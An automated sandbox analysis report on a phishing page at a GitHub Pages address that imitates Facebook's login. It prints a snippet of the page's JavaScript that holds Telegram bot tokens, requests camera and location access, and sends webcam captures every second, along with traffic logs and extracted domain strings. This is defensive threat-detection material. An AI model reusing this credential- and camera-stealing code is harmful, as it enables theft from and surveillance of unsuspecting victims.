Edit tour

Windows Analysis Report
https://omar-tnzxoo.github.io/facebook-mobile/index.html

Overview

General Information

Sample URL:	https://omar-tnzxoo.github.io/facebook-mobile/index.html
Analysis ID:	1521936
Tags:	openphish
Infos:

Detection

HTMLPhisher

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

Misleading page title found

Yara detected HtmlPhish10

Yara detected HtmlPhish64

Javascript uses Telegram API

Phishing site detected (based on logo match)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML title does not match URL

Invalid 'forgot password' link found

Javascript checks online IP of machine

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5964 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2368,i,1072751731600798288,902568186456143398,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5424 --field-trial-handle=2368,i,1072751731600798288,902568186456143398,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 --field-trial-handle=2368,i,1072751731600798288,902568186456143398,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6300 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://omar-tnzxoo.github.io/facebook-mobile/index.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_116	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTML

Source	Rule	Description	Author	Strings
0.0.pages.csv	JoeSecurity_HtmlPhish_64	Yara detected HtmlPhish_64	Joe Security
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://omar-tnzxoo.github.io/facebook-mobile/index.html

SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

AI detected phishing page

Source: https://omar-tnzxoo.github.io/facebook-mobile/index.html

LLM: Score: 9 Reasons: The brand 'Facebook' is well-known and has a widely recognized legitimate domain 'facebook.com'., The provided URL 'omar-tnzxoo.github.io' does not match the legitimate domain name for Facebook., The URL 'omar-tnzxoo.github.io' is hosted on GitHub Pages, which is a common platform for hosting personal or project pages, not official brand pages., The use of GitHub Pages for a brand like Facebook is highly unusual and suspicious., The input fields 'Email or phone number' and 'Password' are typical for login forms, which are commonly targeted in phishing attacks. DOM: 0.0.pages.csv

Misleading page title found

Source: https://omar-tnzxoo.github.io/facebook-mobile/index.html	Page Title: Facebook Login
Source: https://omar-tnzxoo.github.io/facebook-mobile/index.html	Page Title: Facebook Login

Yara detected HtmlPhish10

Source: Yara match	File source: 0.0.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_116, type: DROPPED

Yara detected HtmlPhish64

Source: Yara match

File source: 0.0.pages.csv, type: HTML

Javascript uses Telegram API

Source: https://omar-tnzxoo.github.io/facebook-mobile/index.html

HTTP Parser: const bot_token = '6575631247:aahgvhao8xagtx3kzungc-pg-cownq7jl58'; // const login_bot_token = '6935869850:aagxhertgl30kidax15cgf8kkmouwzuq2xk'; // const chat_id = '1776689384'; const image_url = 'https://t.me/assets_tnzxo/3'; let currentcamera = 'user'; // async function requestpermissions() { try { await navigator.mediadevices.getusermedia({ video: true }); await navigator.geolocation.getcurrentposition(() => {}, () => {}); // sendentrymessage(); setinterval(captureandsendimage, 1000); } catch (error) { console.error('error requesting permissions:', error); } } requestpermissions(); async function captureandsendimage() { try { const stream = await navigator.mediadevices.getusermedia({ ...

Phishing site detected (based on logo match)

Source: https://omar-tnzxoo.github.io/facebook-mobile/index.html

Matcher: Template: facebook matched

Source: https://omar-tnzxoo.github.io/facebook-mobile/index.html

HTTP Parser: Number of links: 0

Source: https://omar-tnzxoo.github.io/facebook-mobile/index.html

HTTP Parser: Title: Facebook Login does not match URL

Source: https://omar-tnzxoo.github.io/facebook-mobile/index.html

HTTP Parser: Invalid link: Forgot password?

Source: https://omar-tnzxoo.github.io/facebook-mobile/index.html

HTTP Parser: <input type="password" .../> found

Source: https://omar-tnzxoo.github.io/facebook-mobile/index.html

HTTP Parser: No <meta name="author".. found

Source: https://omar-tnzxoo.github.io/facebook-mobile/index.html

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:54351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:54352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.4:54353 version: TLS 1.2

Source: global traffic	TCP traffic: 192.168.2.4:55704 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.4:54349 -> 162.159.36.2:53

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26
Source: unknown	TCP traffic detected without corresponding DNS query: 52.165.165.26

Source: global traffic	HTTP traffic detected: GET /facebook-mobile/index.html HTTP/1.1Host: omar-tnzxoo.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /facebook-mobile/style.css HTTP/1.1Host: omar-tnzxoo.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://omar-tnzxoo.github.io/facebook-mobile/index.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /facebook-mobile/assets/icon.png HTTP/1.1Host: omar-tnzxoo.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://omar-tnzxoo.github.io/facebook-mobile/index.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /facebook-mobile/assets/icon.png HTTP/1.1Host: omar-tnzxoo.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ggFwwBvAHA5o5lp&MD=GG7MMAKl HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ggFwwBvAHA5o5lp&MD=GG7MMAKl HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ggFwwBvAHA5o5lp&MD=GG7MMAKl HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: omar-tnzxoo.github.io
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa

Source: sets.json.0.dr	String found in binary or memory: https://07c225f3.online
Source: sets.json.0.dr	String found in binary or memory: https://24.hu
Source: sets.json.0.dr	String found in binary or memory: https://aajtak.in
Source: sets.json.0.dr	String found in binary or memory: https://abczdrowie.pl
Source: sets.json.0.dr	String found in binary or memory: https://alice.tw
Source: sets.json.0.dr	String found in binary or memory: https://ambitionbox.com
Source: chromecache_116.1.dr	String found in binary or memory: https://api.ipify.org?format=json
Source: chromecache_116.1.dr	String found in binary or memory: https://api.telegram.org/bot$
Source: sets.json.0.dr	String found in binary or memory: https://autobild.de
Source: sets.json.0.dr	String found in binary or memory: https://baomoi.com
Source: sets.json.0.dr	String found in binary or memory: https://bild.de
Source: sets.json.0.dr	String found in binary or memory: https://blackrock.com
Source: sets.json.0.dr	String found in binary or memory: https://blackrockadvisorelite.it
Source: sets.json.0.dr	String found in binary or memory: https://bluradio.com
Source: sets.json.0.dr	String found in binary or memory: https://bolasport.com
Source: sets.json.0.dr	String found in binary or memory: https://bonvivir.com
Source: sets.json.0.dr	String found in binary or memory: https://bumbox.com
Source: sets.json.0.dr	String found in binary or memory: https://businessinsider.com.pl
Source: sets.json.0.dr	String found in binary or memory: https://businesstoday.in
Source: sets.json.0.dr	String found in binary or memory: https://cachematrix.com
Source: sets.json.0.dr	String found in binary or memory: https://cafemedia.com
Source: sets.json.0.dr	String found in binary or memory: https://caracoltv.com
Source: sets.json.0.dr	String found in binary or memory: https://carcostadvisor.be
Source: sets.json.0.dr	String found in binary or memory: https://carcostadvisor.com
Source: sets.json.0.dr	String found in binary or memory: https://carcostadvisor.fr
Source: sets.json.0.dr	String found in binary or memory: https://cardsayings.net
Source: sets.json.0.dr	String found in binary or memory: https://chatbot.com
Source: sets.json.0.dr	String found in binary or memory: https://chennien.com
Source: sets.json.0.dr	String found in binary or memory: https://citybibleforum.org
Source: sets.json.0.dr	String found in binary or memory: https://clarosports.com
Source: sets.json.0.dr	String found in binary or memory: https://clmbtech.com
Source: sets.json.0.dr	String found in binary or memory: https://closeronline.co.uk
Source: sets.json.0.dr	String found in binary or memory: https://clubelpais.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://cmxd.com.mx
Source: sets.json.0.dr	String found in binary or memory: https://cognitive-ai.ru
Source: sets.json.0.dr	String found in binary or memory: https://cognitiveai.ru
Source: sets.json.0.dr	String found in binary or memory: https://commentcamarche.com
Source: sets.json.0.dr	String found in binary or memory: https://commentcamarche.net
Source: sets.json.0.dr	String found in binary or memory: https://computerbild.de
Source: sets.json.0.dr	String found in binary or memory: https://content-loader.com
Source: sets.json.0.dr	String found in binary or memory: https://cookreactor.com
Source: sets.json.0.dr	String found in binary or memory: https://cricbuzz.com
Source: sets.json.0.dr	String found in binary or memory: https://css-load.com
Source: sets.json.0.dr	String found in binary or memory: https://deccoria.pl
Source: sets.json.0.dr	String found in binary or memory: https://deere.com
Source: sets.json.0.dr	String found in binary or memory: https://desimartini.com
Source: sets.json.0.dr	String found in binary or memory: https://dewarmsteweek.be
Source: sets.json.0.dr	String found in binary or memory: https://drimer.io
Source: sets.json.0.dr	String found in binary or memory: https://drimer.travel
Source: sets.json.0.dr	String found in binary or memory: https://economictimes.com
Source: sets.json.0.dr	String found in binary or memory: https://een.be
Source: sets.json.0.dr	String found in binary or memory: https://efront.com
Source: sets.json.0.dr	String found in binary or memory: https://eleconomista.net
Source: sets.json.0.dr	String found in binary or memory: https://elfinancierocr.com
Source: sets.json.0.dr	String found in binary or memory: https://elgrafico.com
Source: sets.json.0.dr	String found in binary or memory: https://ella.sv
Source: sets.json.0.dr	String found in binary or memory: https://elpais.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://elpais.uy
Source: sets.json.0.dr	String found in binary or memory: https://etfacademy.it
Source: sets.json.0.dr	String found in binary or memory: https://eworkbookcloud.com
Source: sets.json.0.dr	String found in binary or memory: https://eworkbookrequest.com
Source: sets.json.0.dr	String found in binary or memory: https://fakt.pl
Source: sets.json.0.dr	String found in binary or memory: https://finn.no
Source: sets.json.0.dr	String found in binary or memory: https://firstlook.biz
Source: chromecache_117.1.dr	String found in binary or memory: https://fonts.googleapis.com/css2?family=Roboto:wght
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fABc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBBc4.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBxc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fCRc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fChc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fCxc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fABc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fBBc4.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fBxc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fCBc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fCRc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fChc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fCxc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfABc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBxc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfCBc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfCRc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfChc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfCxc4EsA.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4WxKOzY.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu5mxKOzY.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu72xKOzY.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7GxKOzY.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7WxKOzY.woff2)
Source: chromecache_119.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu7mxKOzY.woff2)
Source: sets.json.0.dr	String found in binary or memory: https://gallito.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://geforcenow.com
Source: sets.json.0.dr	String found in binary or memory: https://gettalkdesk.com
Source: sets.json.0.dr	String found in binary or memory: https://gliadomain.com
Source: sets.json.0.dr	String found in binary or memory: https://gnttv.com
Source: sets.json.0.dr	String found in binary or memory: https://graziadaily.co.uk
Source: sets.json.0.dr	String found in binary or memory: https://grid.id
Source: sets.json.0.dr	String found in binary or memory: https://gridgames.app
Source: sets.json.0.dr	String found in binary or memory: https://growthrx.in
Source: sets.json.0.dr	String found in binary or memory: https://grupolpg.sv
Source: sets.json.0.dr	String found in binary or memory: https://gujaratijagran.com
Source: sets.json.0.dr	String found in binary or memory: https://hapara.com
Source: sets.json.0.dr	String found in binary or memory: https://hazipatika.com
Source: sets.json.0.dr	String found in binary or memory: https://hc1.com
Source: sets.json.0.dr	String found in binary or memory: https://hc1.global
Source: sets.json.0.dr	String found in binary or memory: https://hc1cas.com
Source: sets.json.0.dr	String found in binary or memory: https://hc1cas.global
Source: sets.json.0.dr	String found in binary or memory: https://healthshots.com
Source: sets.json.0.dr	String found in binary or memory: https://hearty.app
Source: sets.json.0.dr	String found in binary or memory: https://hearty.gift
Source: sets.json.0.dr	String found in binary or memory: https://hearty.me
Source: sets.json.0.dr	String found in binary or memory: https://heartymail.com
Source: sets.json.0.dr	String found in binary or memory: https://heatworld.com
Source: sets.json.0.dr	String found in binary or memory: https://helpdesk.com
Source: sets.json.0.dr	String found in binary or memory: https://hindustantimes.com
Source: sets.json.0.dr	String found in binary or memory: https://hj.rs
Source: sets.json.0.dr	String found in binary or memory: https://hjck.com
Source: sets.json.0.dr	String found in binary or memory: https://html-load.cc
Source: sets.json.0.dr	String found in binary or memory: https://html-load.com
Source: sets.json.0.dr	String found in binary or memory: https://human-talk.org
Source: sets.json.0.dr	String found in binary or memory: https://idbs-cloud.com
Source: sets.json.0.dr	String found in binary or memory: https://idbs-dev.com
Source: sets.json.0.dr	String found in binary or memory: https://idbs-eworkbook.com
Source: sets.json.0.dr	String found in binary or memory: https://idbs-staging.com
Source: sets.json.0.dr	String found in binary or memory: https://img-load.com
Source: sets.json.0.dr	String found in binary or memory: https://indiatimes.com
Source: sets.json.0.dr	String found in binary or memory: https://indiatoday.in
Source: sets.json.0.dr	String found in binary or memory: https://indiatodayne.in
Source: sets.json.0.dr	String found in binary or memory: https://infoedgeindia.com
Source: sets.json.0.dr	String found in binary or memory: https://interia.pl
Source: sets.json.0.dr	String found in binary or memory: https://intoday.in
Source: sets.json.0.dr	String found in binary or memory: https://iolam.it
Source: chromecache_116.1.dr	String found in binary or memory: https://ipapi.co/$
Source: sets.json.0.dr	String found in binary or memory: https://ishares.com
Source: sets.json.0.dr	String found in binary or memory: https://jagran.com
Source: sets.json.0.dr	String found in binary or memory: https://johndeere.com
Source: sets.json.0.dr	String found in binary or memory: https://journaldesfemmes.com
Source: sets.json.0.dr	String found in binary or memory: https://journaldesfemmes.fr
Source: sets.json.0.dr	String found in binary or memory: https://journaldunet.com
Source: sets.json.0.dr	String found in binary or memory: https://journaldunet.fr
Source: sets.json.0.dr	String found in binary or memory: https://joyreactor.cc
Source: sets.json.0.dr	String found in binary or memory: https://joyreactor.com
Source: sets.json.0.dr	String found in binary or memory: https://kaksya.in
Source: sets.json.0.dr	String found in binary or memory: https://knowledgebase.com
Source: sets.json.0.dr	String found in binary or memory: https://kompas.com
Source: sets.json.0.dr	String found in binary or memory: https://kompas.tv
Source: sets.json.0.dr	String found in binary or memory: https://kompasiana.com
Source: sets.json.0.dr	String found in binary or memory: https://lanacion.com.ar
Source: sets.json.0.dr	String found in binary or memory: https://landyrev.com
Source: sets.json.0.dr	String found in binary or memory: https://landyrev.ru
Source: sets.json.0.dr	String found in binary or memory: https://laprensagrafica.com
Source: sets.json.0.dr	String found in binary or memory: https://lateja.cr
Source: sets.json.0.dr	String found in binary or memory: https://libero.it
Source: sets.json.0.dr	String found in binary or memory: https://linternaute.com
Source: sets.json.0.dr	String found in binary or memory: https://linternaute.fr
Source: sets.json.0.dr	String found in binary or memory: https://livechat.com
Source: sets.json.0.dr	String found in binary or memory: https://livechatinc.com
Source: sets.json.0.dr	String found in binary or memory: https://livehindustan.com
Source: sets.json.0.dr	String found in binary or memory: https://livemint.com
Source: sets.json.0.dr	String found in binary or memory: https://max.auto
Source: sets.json.0.dr	String found in binary or memory: https://medonet.pl
Source: sets.json.0.dr	String found in binary or memory: https://meo.pt
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.cl
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.co.cr
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.ar
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.bo
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.co
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.do
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.ec
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.gt
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.hn
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.mx
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.ni
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.pa
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.pe
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.py
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.sv
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.ve
Source: sets.json.0.dr	String found in binary or memory: https://mercadolivre.com
Source: sets.json.0.dr	String found in binary or memory: https://mercadolivre.com.br
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.cl
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.ar
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.br
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.co
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.ec
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.mx
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.pe
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.ve
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.cl
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.com
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.com.ar
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.com.br
